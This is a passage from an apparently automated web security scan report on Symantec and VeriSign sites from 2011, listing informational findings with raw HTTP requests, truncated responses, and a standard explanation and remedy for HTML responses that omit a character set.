User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1722
Date: Fri, 09 Sep 2011 21:47:39 GMT
Content-Length: 23505
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Global Sites - Symantec Corp.</title>
<meta http-equiv="Content-Type" conten
...[SNIP]...

21.67. https://www-secure.symantec.com/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /index.jsp

Request

GET /index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1720
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut
...[SNIP]...

21.68. https://www-secure.symantec.com/rss/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /rss/index.jsp

Request

GET /rss/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1694
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>RSS - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv=
...[SNIP]...

21.69. https://www-secure.symantec.com/sitemap/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /sitemap/index.jsp

Request

GET /sitemap/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1616
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Site Map: Information Security - Computer Security Solutions and Services | Symantec Corp</title>
<meta http-equiv=
...[SNIP]...

21.70. https://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...

21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.custom.js

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 985
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

21.73. https://www.verisign.com/products-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /products-services/index.html

Request

GET /products-services/index.html HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://securitycenter.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 107427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

   <!--HEADER ASSETS-->
       <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee
...[SNIP]...

22. HTML does not specify charset
There are 63 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /assets/fonts/samd____-webfont.woff

Request

GET /assets/fonts/samd____-webfont.woff HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "2ef819b-7544-4a59eedb01b80"
Accept-Ranges: bytes
Content-Type: text/html
Age: 3152
Date: Fri, 09 Sep 2011 21:27:10 GMT
Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT
Expires: Sun, 09 Oct 2011 13:52:54 GMT
Content-Length: 30020
Connection: keep-alive

wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2
o..fpgm...........e
...[SNIP]...

22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /authweb/en_ch/assets/shared/js/google-analytics.js

Request

GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 27500
Date: Fri, 09 Sep 2011 21:25:03 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 460
Connection: keep-alive

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.ch']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scri
...[SNIP]...

22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 73854
Date: Fri, 09 Sep 2011 21:25:44 GMT
Expires: Sun, 09 Oct 2011 18:24:34 GMT
Content-Length: 1356
Connection: keep-alive

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 69510
Date: Fri, 09 Sep 2011 21:24:45 GMT
Expires: Sun, 09 Oct 2011 05:58:30 GMT
Content-Length: 37327
Connection: keep-alive

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/en_us/assets/shared/js/google-analytics.js

Request

GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69191
Expires: Sun, 09 Oct 2011 02:25:41 GMT
Content-Length: 461

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scr
...[SNIP]...

22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 8048


//----------------------------------------//
// My Account M-flyout form functionality
//----------------------------------------//

$("#myacc_search_btn").click(function(){
   //document.get
...[SNIP]...

22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558


/*******************************************
**             Header functions             **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/header/js/jquery.autocomplete.js

Request

GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 14
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 22148

/*
* jQuery Autocomplete plugin 1.1
*
* Copyright (c) 2009 Jörn Zaefferer
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* ht
...[SNIP]...

22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/home/js/home.js

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 16
Expires: Sun, 09 Oct 2011 21:38:32 GMT
Content-Length: 2725

/*******************************************
**         HP specific functions         **
*******************************************/


//External link functionality
$('a[rel="external"]').click(funct
...[SNIP]...

22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/global-preload.js

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518


// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/google-analytics.js

Request

GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.boxshadow.js

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 1
Expires: Sun, 09 Oct 2011 21:38:26 GMT
Content-Length: 1356

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 39037
Expires: Sun, 09 Oct 2011 10:47:51 GMT
Content-Length: 1614

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...

22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/oo-engine.js

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 77341
Expires: Sun, 09 Oct 2011 00:09:34 GMT
Content-Length: 4102


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
